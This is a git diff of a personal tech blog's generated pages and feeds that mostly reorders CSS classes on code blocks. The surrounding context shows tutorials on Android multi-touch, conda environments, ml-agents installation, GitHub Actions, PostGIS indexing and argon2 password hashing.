    @@ -366,7 +366,7 @@ 

    Episode 5 - Android Multi-Touch

    Now that we've created a new Finger instance inside our TreeMap in the order the screen is touched, and we remove that instance when the screen input has been released, we are ready to draw on the screen from our inputs.

    By iterating through the TreeMap, in each loop we know the previous and next values in the array, so we can draw a circle at each input and a line between them. This also lets us determine the midpoint between the two points so we can write text there. For this example, I've chosen to write the distance between the two inputs to demonstrate that this can also be dynamic in nature.

    -
     1
    +
     1
      2
      3
      4
    diff --git a/episode-8-anaconda.html b/episode-8-anaconda.html
    index 12e2eb88..66fc5f47 100644
    --- a/episode-8-anaconda.html
    +++ b/episode-8-anaconda.html
    @@ -159,19 +159,19 @@ 

    Episode 8 - Anaconda

    Python is one of my favourite languages to develop in (if you haven't noticed yet). My favourite feature of Python is how easy it is to share your work with others and integrate other people's code into your own projects. However, as a project grows older it can be cumbersome to keep track of the hundreds of dependencies it relies on to work, even more so when all of those packages are also being updated and changing functionality.

    One elegant solution that I always use when first starting a new project is Anaconda (https://www.anaconda.com/). Anaconda is a free, easy-to-install package and environment manager for Python. It is very simple to use: when starting a new project, you just create a new environment (within the Anaconda navigator) with the Python version you wish to use and then activate it. Simple as that.

    -
    1
    conda create --name new_environment_name python=3.5
    +
    1
    conda create --name new_environment_name python=3.5
     

    In one single line, we have just created a new environment named "new_environment_name" and specified that this environment will use Python version 3.5. Now to activate the environment it is as simple as typing "activate new_environment_name".

    -
    1
    activate new_environment_name
    +
    1
    activate new_environment_name
     

    To see what packages (and their versions) are contained within our newly created environment, the command is:

    -
    1
    conda list
    +
    1
    conda list
     

    Now that we have created, activated and peeked inside our newly created environment, we need to add some packages we might use! This is as simple as "conda install PACKAGENAME"; for example, we might want to install matplotlib, a widely used data visualization package. Installing matplotlib into our environment is done with:

    -
    1
    conda install matplotlib
    +
    1
    conda install matplotlib
     

    You will note that when this runs, it also asks to install all the dependencies that matplotlib relies on. Later, once you have more packages, it will also notify you if some clash and need to be upgraded/downgraded so that all packages have a common version to work with.

    @@ -214,11 +214,11 @@

    Episode 8 - Anaconda

    By following these simple constraint rules, it is very easy to manage package versions and maintain dependencies within your project without tearing your hair out when packages update and break your project.

    Another major benefit of using Anaconda to manage your project's package dependencies comes when you're developing alongside colleagues and discover bugs you wish to share with them. Sharing all the dependencies (and their respective versions) with a colleague is as easy as generating an "environment file" and sending it over, so they have exactly the same environment as you. This is done with the following command:

    -
    1
    conda env export > environment.yml
    +
    1
    conda env export > environment.yml
     

    Similarly, if your colleague sends you their "environment file", the command to reproduce their environment is (please note that the name of the environment is encoded in the first line of the .yml file):

    -
    1
    conda env create -f environment.yml
    +
    1
    conda env create -f environment.yml
     

    In summary, Anaconda can be used to easily manage packages and dependencies across a project and fast-track test/bug reproduction across multiple machines seamlessly. Personally, I would always advise using a package manager, no matter the project's size.

    diff --git a/episode-9-web-enabled-universal-remote-part-1.html b/episode-9-web-enabled-universal-remote-part-1.html index 27fbbd6c..7a31d570 100644 --- a/episode-9-web-enabled-universal-remote-part-1.html +++ b/episode-9-web-enabled-universal-remote-part-1.html @@ -170,7 +170,7 @@

    Episode 9 - Web Enabled U

    Now before connecting the entire circuit together, one should always test that components work in an expected way. To achieve this for the infrared receiver, a basic program to interface between the receiver and the microcontroller is needed.

    For a basic test, an LED should light up whenever the infrared receiver is receiving a signal. By following the circuit diagram with the corresponding code for the NodeMCU, this test for the receiver should be reproducible at home; please note that for other infrared receivers you will need to check the pinouts.

    Fritzing_FEKX395tbZ.png

    -
     1
    +
     1
      2
      3
      4
    diff --git a/feeds/all.atom.xml b/feeds/all.atom.xml
    index f352e9a3..30b23bda 100644
    --- a/feeds/all.atom.xml
    +++ b/feeds/all.atom.xml
    @@ -8,21 +8,21 @@
     <p>Miniconda was set up through the installation instructions listed on the website for Miniconda3 macOS Apple M1 64-bit pkg:</p>
     <p><a href="https://docs.conda.io/en/latest/miniconda.html">https://docs.conda.io/en/latest/miniconda.html</a></p>
     <p>Following this, the conda-forge is added as a channel (instructions from <a href="https://conda-forge.org/docs/user/introduction.html">https://conda-forge.org/docs/user/introduction.html</a>):</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>conda config --add channels conda-forge
     conda config --set channel_priority strict
     </code></pre></div>
     </td></tr></tbody></table>
     <h2 id="conda-environment">Conda environment</h2>
     <p>Big thank you to this github thread (and user @automata) for finally leading me down a successful path <a href="https://github.com/Unity-Technologies/ml-agents/issues/5797">https://github.com/Unity-Technologies/ml-agents/issues/5797</a>:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>conda create -n mlagents <span class="nv">python</span><span class="o">==</span><span class="m">3</span>.10.7
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>conda create -n mlagents <span class="nv">python</span><span class="o">==</span><span class="m">3</span>.10.7
     </code></pre></div>
     </td></tr></tbody></table>
     <blockquote>
     <p>Ensure to download the release specifically that you are targetting which are managed by branches on the repo. IE <a href="https://github.com/Unity-Technologies/ml-agents/tree/latest_release">https://github.com/Unity-Technologies/ml-agents/tree/latest_release</a>. If you are using the gh CLI <code>gh repo clone Unity-Technologies/ml-agents -- --branch release_20</code></p>
     </blockquote>
     <p>Next we need to edit <code>setup.py</code> found in <code>ml-agents-release_20/ml-agents/setup.py</code>, specifically line 71 to:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="s2">"torch&gt;=1.8.0,&lt;=1.12.0;(platform_system!='Windows' and python_version&gt;='3.9')"</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="s2">"torch&gt;=1.8.0,&lt;=1.12.0;(platform_system!='Windows' and python_version&gt;='3.9')"</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <p>Now we install the ml-agents package (which has a dependancy of torch) through the locally edited version:</p>
    @@ -30,7 +30,7 @@ conda config --set channel_priority strict
     <p>Theoretically, this is where we should've been done and been able to run <code>mlagents-learn</code> without any more problems, but that wasn't the case. The next error we run into is:</p>
     <p><code>TypeError: Descriptors cannot not be created directly.</code></p>
     <p>Which was resolved through <a href="https://stackoverflow.com/questions/72441758/typeerror-descriptors-cannot-not-be-created-directly">https://stackoverflow.com/questions/72441758/typeerror-descriptors-cannot-not-be-created-directly</a></p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip install protobuf~<span class="o">=</span><span class="m">3</span>.20
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip install protobuf~<span class="o">=</span><span class="m">3</span>.20
     </code></pre></div>
     </td></tr></tbody></table>
     <blockquote>
    @@ -42,7 +42,7 @@ conda config --set channel_priority strict
     </blockquote>
     <p><code>ImportError: dlopen(/Users/jackmckew/miniconda3/envs/mlagentstest/lib/python3.10/site-packages/grpc/_cython/cygrpc.cpython-310-darwin.so, 0x0002): symbol not found in flat namespace '_CFRelease'</code></p>
     <p>Which was resolved through <a href="https://stackoverflow.com/questions/72620996/apple-m1-symbol-not-found-cfrelease-while-running-python-app">https://stackoverflow.com/questions/72620996/apple-m1-symbol-not-found-cfrelease-while-running-python-app</a></p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip uninstall grpcio -y
     conda install grpcio -y
     </code></pre></div>
    @@ -52,7 +52,7 @@ conda install grpcio -y
     <p>Finally we can run:</p>
     <p><code>mlagents-learn</code></p>
     <p>To be met with this glorious screen</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/feeds/android.atom.xml b/feeds/android.atom.xml
    index ae21ca13..39df15ca 100644
    --- a/feeds/android.atom.xml
    +++ b/feeds/android.atom.xml
    @@ -1,7 +1,7 @@
     
     Jack McKew's Blog - Androidhttps://jackmckew.dev/2018-12-21T01:30:00+11:00Engineer | Software Developer | Data ScientistEpisode 5 - Android Multi-Touch2018-12-21T01:30:00+11:002018-12-21T01:30:00+11:00Jack McKewtag:jackmckew.dev,2018-12-21:/episode-5-android-multi-touch.html<body><p>This week's episode of Code Fridays will go into detail on how to handle multi-touch inputs within Android. Firstly to handle the location on where the screen in being touched we need to create a class to handle the interaction. By creating a public class like Finger.java as can …</p></body><body><p>This week's episode of Code Fridays will go into detail on how to handle multi-touch inputs within Android. Firstly to handle the location on where the screen in being touched we need to create a class to handle the interaction. By creating a public class like Finger.java as can be seen below it contains 3 values: x_pos, y_pos and id. It is also useful to create a constructor so that other classes can easily construct the Finger class.</p>
     <p><img alt="ezgif.com-video-to-gif-2" class="img-fluid" src="https://jackmckew.dev/img/ezgif.com-video-to-gif-2.gif"/></p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -31,7 +31,7 @@
     <p>Now that we have a class to store our details on how each finger is touching the screen, we now need to interact with some base level Java. Firstly we need to extend a view within the Android application so that the application knows what boundaries to deal, in my test application, I've just used the entire screen as a view.</p>
     <p>After that an array is needed to store the data of multiple inputs touching the screen. I've used a TreeMap in this example as this allows for ease later on so that they are in order on how they were input, however this comes with a downside to this example as lifting a input in the middle of the order touched crashes the array, this will be fixed in a later episode.</p>
     <p>A paint is initialized for both the stroke paint for drawing lines between the touches and a paint for the text that is to come. Generic constructors for the view are also listed below.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -97,7 +97,7 @@
     </code></pre></div>
     </td></tr></tbody></table>
     <p>Now that everything is initialized and ready to draw some graphics on the screen so that the application is interactive, now we have to interface with touch events. This is done by creating a new function within our View class, that takes in a MotionEvent on the View so that we can detect different types of touch events. Documentation on this can be found (<a href="https://developer.android.com/training/graphics/opengl/touch#java">https://developer.android.com/training/graphics/opengl/touch#java</a>).</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -208,7 +208,7 @@
     </td></tr></tbody></table>
     <p>Now that we've created a new Finger class inside our TreeMap by the order that the screen is touched in and we're removing that class when the screen input has been released, we are now ready to draw on the screen from our inputs.</p>
     <p>By iterating through the TreeMap, in each loop we know what the previous and what the next value in the array we can draw a circle for where the input is and a line between. This also allows us to determine whereabouts is the point in between these two points so we can write text. For this example, I've chosen to write the length of the distance between the two inputs to demonstrate that this can also be dynamic in nature.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/feeds/book-reviews.atom.xml b/feeds/book-reviews.atom.xml
    index bbc2aa15..6ba1f255 100644
    --- a/feeds/book-reviews.atom.xml
    +++ b/feeds/book-reviews.atom.xml
    @@ -58,7 +58,7 @@
     <h2 id="crash-early">Crash Early</h2>
     <p>By crashing early, it means the program does a lot less damage than a crippled program. This concept can be implemented by checking for the inverse of the requirement and erroring. By doing this, it means the code is more readable in finding the requirements that it must meet. It captures more potential issues before they cause damage versus checking all the ducks are lined up.</p>
     <p>For demonstrating this, we will use the example of a square root function. As we know, square root wants to have a positive number given to it (unless using complex numbers).</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    diff --git a/feeds/cicd.atom.xml b/feeds/cicd.atom.xml
    index 73c7a73a..05db22a2 100644
    --- a/feeds/cicd.atom.xml
    +++ b/feeds/cicd.atom.xml
    @@ -60,7 +60,7 @@
     <h2 id="publish-to-marketplace">Publish to Marketplace</h2>
     <p>Once you've implemented these few files, you should get a warning at the top of the repository on GitHub hinting if you want to publish this on the marketplace. This is done smoothly with creating a release of your project, and that's it, done!</p>
 <p>Now users can integrate your action into the CI/CD pipeline as easily as:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="p p-Indicator">-</span> <span class="nt">name</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">Python Interrogate Check</span>
       <span class="nt">uses</span><span class="p">:</span> <span class="l l-Scalar l-Scalar-Plain">JackMcKew/python-interrogate-check@v0.1.1</span>
     </code></pre></div>
    @@ -87,7 +87,7 @@
     <h1 id="action-format-yaml">Action Format (.yaml)</h1>
     <p>A Github Action is defined with a <code>&lt;action_name&gt;.yaml</code> file which must be placed within <code>.github/workflows</code> from the base of the repository. As many actions as you want can be placed in this folder, and will subsequently run when triggered.</p>
     <p>The base structure of a <code>link_checker.yaml</code> file is:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -162,7 +162,7 @@
     <p>Fork repository &gt; Make changes &gt; Submit Pull Request with changes &gt; Check changes &gt; Merge into repository</p>
     </blockquote>
     <p>When the action was first set up for actions to run on pull requests, it kept throwing an error:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>The process <span class="s1">'/usr/bin/git'</span> failed with <span class="nb">exit</span> code <span class="m">1</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>The process <span class="s1">'/usr/bin/git'</span> failed with <span class="nb">exit</span> code <span class="m">1</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <p>This was determined to be intentional design by Github as a mitigation against the possibility that a bad actor could open PRs against your repo and do things like list out secrets or just run up a large bill (once we start charging) on your account.</p>
    @@ -180,7 +180,7 @@
     <blockquote>
     <p>Ensure to use <code>if: steps.prcomm.outputs.BOOL_TRIGGERED == 'true'</code> in all subsequent jobs you want triggered if the phrase is found, otherwise the action will become recursive: check for comment, run checks, make a comment, check for comment, etc</p>
     </blockquote>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/feeds/data-science.atom.xml b/feeds/data-science.atom.xml
    index f07ebd99..f0ee43d7 100644
    --- a/feeds/data-science.atom.xml
    +++ b/feeds/data-science.atom.xml
    @@ -8,21 +8,21 @@
     <p>Miniconda was set up through the installation instructions listed on the website for Miniconda3 macOS Apple M1 64-bit pkg:</p>
     <p><a href="https://docs.conda.io/en/latest/miniconda.html">https://docs.conda.io/en/latest/miniconda.html</a></p>
     <p>Following this, the conda-forge is added as a channel (instructions from <a href="https://conda-forge.org/docs/user/introduction.html">https://conda-forge.org/docs/user/introduction.html</a>):</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>conda config --add channels conda-forge
     conda config --set channel_priority strict
     </code></pre></div>
     </td></tr></tbody></table>
     <h2 id="conda-environment">Conda environment</h2>
     <p>Big thank you to this github thread (and user @automata) for finally leading me down a successful path <a href="https://github.com/Unity-Technologies/ml-agents/issues/5797">https://github.com/Unity-Technologies/ml-agents/issues/5797</a>:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>conda create -n mlagents <span class="nv">python</span><span class="o">==</span><span class="m">3</span>.10.7
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>conda create -n mlagents <span class="nv">python</span><span class="o">==</span><span class="m">3</span>.10.7
     </code></pre></div>
     </td></tr></tbody></table>
     <blockquote>
     <p>Ensure to download the release specifically that you are targetting which are managed by branches on the repo. IE <a href="https://github.com/Unity-Technologies/ml-agents/tree/latest_release">https://github.com/Unity-Technologies/ml-agents/tree/latest_release</a>. If you are using the gh CLI <code>gh repo clone Unity-Technologies/ml-agents -- --branch release_20</code></p>
     </blockquote>
     <p>Next we need to edit <code>setup.py</code> found in <code>ml-agents-release_20/ml-agents/setup.py</code>, specifically line 71 to:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="s2">"torch&gt;=1.8.0,&lt;=1.12.0;(platform_system!='Windows' and python_version&gt;='3.9')"</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="s2">"torch&gt;=1.8.0,&lt;=1.12.0;(platform_system!='Windows' and python_version&gt;='3.9')"</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <p>Now we install the ml-agents package (which has a dependancy of torch) through the locally edited version:</p>
    @@ -30,7 +30,7 @@ conda config --set channel_priority strict
     <p>Theoretically, this is where we should've been done and been able to run <code>mlagents-learn</code> without any more problems, but that wasn't the case. The next error we run into is:</p>
     <p><code>TypeError: Descriptors cannot not be created directly.</code></p>
     <p>Which was resolved through <a href="https://stackoverflow.com/questions/72441758/typeerror-descriptors-cannot-not-be-created-directly">https://stackoverflow.com/questions/72441758/typeerror-descriptors-cannot-not-be-created-directly</a></p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip install protobuf~<span class="o">=</span><span class="m">3</span>.20
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip install protobuf~<span class="o">=</span><span class="m">3</span>.20
     </code></pre></div>
     </td></tr></tbody></table>
     <blockquote>
    @@ -42,7 +42,7 @@ conda config --set channel_priority strict
     </blockquote>
     <p><code>ImportError: dlopen(/Users/jackmckew/miniconda3/envs/mlagentstest/lib/python3.10/site-packages/grpc/_cython/cygrpc.cpython-310-darwin.so, 0x0002): symbol not found in flat namespace '_CFRelease'</code></p>
     <p>Which was resolved through <a href="https://stackoverflow.com/questions/72620996/apple-m1-symbol-not-found-cfrelease-while-running-python-app">https://stackoverflow.com/questions/72620996/apple-m1-symbol-not-found-cfrelease-while-running-python-app</a></p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip uninstall grpcio -y
     conda install grpcio -y
     </code></pre></div>
    @@ -52,7 +52,7 @@ conda install grpcio -y
     <p>Finally we can run:</p>
     <p><code>mlagents-learn</code></p>
     <p>To be met with this glorious screen</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/feeds/data-visualisation.atom.xml b/feeds/data-visualisation.atom.xml
    index 812c5e08..6441a682 100644
    --- a/feeds/data-visualisation.atom.xml
    +++ b/feeds/data-visualisation.atom.xml
    @@ -4,7 +4,7 @@
     <p>Next, in the <code>draw</code> function, which is called repeatedly while the browser has the page open, we loop through all the objects in the array and draw a circle (an ellipse with equal radii), colouring it according to how big its radius is (this is so we can watch it fade as it grows). We make use of the <code>stroke</code> function to define the colour of the lines for what we'll be drawing in that instance. If a drop has become too big we remove it from the array and add a new random drop; if it's still undersize we increase its radius and colour.</p>
     <p>Finally, to add interactivity, we make use of the <code>mouseIsPressed</code> variable to determine if the user has clicked on the visualization, and add a drop into the array at the X &amp; Y position where the user clicked.</p>
     <p align="center"><iframe frameborder="0" height="400" src="https://editor.p5js.org/JackMcKew/embed/u2ga-k6rk" width="100%"></iframe></p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/feeds/databases.atom.xml b/feeds/databases.atom.xml
    index c1c815cd..4fb77cfa 100644
    --- a/feeds/databases.atom.xml
    +++ b/feeds/databases.atom.xml
    @@ -10,7 +10,7 @@
     <p><code>ogr2ogr -f "PostgreSQL" PG:"dbname=postgres user=postgres password=root host=localhost" "water_polygons.shp" -progress -overwrite -nlt PROMOTE_TO_MULTI -nln water</code></p>
     <h2 id="generate-points">Generate points</h2>
     <p>Now that we have our polygons loaded into a table, we need to generate points to be evaluated:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @@ -25,7 +25,7 @@
     </td></tr></tbody></table>
     <h2 id="baseline-test">Baseline test</h2>
     <p>Our baseline test, a point-in-polygon spatial join (counting how many points are within each polygon), can demonstrate the effectiveness of indexing, point-in-polygon calculations and general overhead. By using the <code>EXPLAIN ANALYZE</code> operator in PostgreSQL, we can look into the inner workings of how the database plans and executes the query, along with how long the query took. We'll also take only 50% of the points, as querying the entire table defeats the purpose of this task.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @@ -39,7 +39,7 @@
     </code></pre></div>
     </td></tr></tbody></table>
     <p>By running without any of the following optimizations, we get the result of:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -75,7 +75,7 @@
     <h1 id="optimize-techniques">Optimize Techniques</h1>
     <h2 id="set-the-page-size">Set the page size</h2>
     <p>Kudos to Paul Ramsey <a href="http://blog.cleverelephant.ca/2018/09/postgis-external-storage.html">source</a> for demonstrating the effectiveness of setting the page size for PostgreSQL (and by extension PostGIS). By default, PostgreSQL restricts itself to a set page size of internal memory, meaning the database is only allowed a fixed amount of memory to process queries, which does not leverage the computing power available on our machines. Allowing PostgreSQL to use external memory not only makes use of the memory available but should also improve our query performance.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @@ -89,7 +89,7 @@
     </code></pre></div>
     </td></tr></tbody></table>
     <p>By running the baseline test again:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -131,11 +131,11 @@
     </blockquote>
     <h2 id="create-a-spatial-index">Create a spatial index</h2>
     <p>One technique that should always be used in databases is indexing, especially for geospatial databases. Creating an index on our database is as simple as:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="k">CREATE</span> <span class="k">INDEX</span> <span class="n">geometry_index</span> <span class="k">ON</span> <span class="n">water</span> <span class="k">USING</span> <span class="n">GIST</span><span class="p">(</span><span class="n">wkb_geometry</span><span class="p">);</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="k">CREATE</span> <span class="k">INDEX</span> <span class="n">geometry_index</span> <span class="k">ON</span> <span class="n">water</span> <span class="k">USING</span> <span class="n">GIST</span><span class="p">(</span><span class="n">wkb_geometry</span><span class="p">);</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <p>This works by computing the bounding box of each geometry in the dataset; whenever a query comes in that needs to evaluate the geometries (e.g. an intersection), the query planner first reduces the candidate set to geometries whose bounding box passes the query, before evaluating the full geometry.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/feeds/engineering.atom.xml b/feeds/engineering.atom.xml
    index db93ebcd..35d2b554 100644
    --- a/feeds/engineering.atom.xml
    +++ b/feeds/engineering.atom.xml
    @@ -65,11 +65,11 @@
     </ol>
     <p>From this, we will use the argon2 hashing algorithm. As normal, it is best practice to set up a virtual environment (or conda environment) and install the dependencies, in this case passlib.</p>
     <p>First of all, import the hashing algorithm you wish to use from the passlib package:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="kn">from</span> <span class="nn">passlib.hash</span> <span class="kn">import</span> <span class="n">argon2</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="kn">from</span> <span class="nn">passlib.hash</span> <span class="kn">import</span> <span class="n">argon2</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <p>Having imported the hashing algorithm, hashing the password in our case is very simple, and we can have a peek at what the output hash looks like:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="nb">hash</span> <span class="o">=</span> <span class="n">argon2</span><span class="o">.</span><span class="n">hash</span><span class="p">(</span><span class="s2">"super_secret_password"</span><span class="p">)</span>
     
    @@ -88,7 +88,7 @@
     <li>\$mvLTquN71JPjuC+S9QNXYA - the base64-encoded hashed password (derived key), using standard base64 encoding and no padding.</li>
     </ul>
     <p>If we run this again, we can check that the outputs are completely different due to the randomly generated salt.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="nb">hash</span> <span class="o">=</span> <span class="n">argon2</span><span class="o">.</span><span class="n">hash</span><span class="p">(</span><span class="s2">"super_secret_password"</span><span class="p">)</span>
     
    @@ -100,14 +100,14 @@
     </blockquote>
     <p>Now that we've generated our new passwords, stored them away in a secure database somewhere, using a secure method of communication somehow, our user wants to login with the password they signed up with ("super_secret_password") and we have to check if this is the correct password.</p>
     <p>To do this with passlib, it is as simple as calling the <code>.verify</code> function with the plaintext and the equivalent hash, which returns a boolean indicating whether or not the password is correct.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="nb">print</span><span class="p">(</span><span class="n">argon2</span><span class="o">.</span><span class="n">verify</span><span class="p">(</span><span class="s2">"super_secret_password"</span><span class="p">,</span><span class="nb">hash</span><span class="p">))</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="nb">print</span><span class="p">(</span><span class="n">argon2</span><span class="o">.</span><span class="n">verify</span><span class="p">(</span><span class="s2">"super_secret_password"</span><span class="p">,</span><span class="nb">hash</span><span class="p">))</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <blockquote>
     <p>True</p>
     </blockquote>
     <p>Hooray! Our password verification system works. Now we would like to check that if the user inputs an incorrect password, our algorithm correctly returns false.</p>
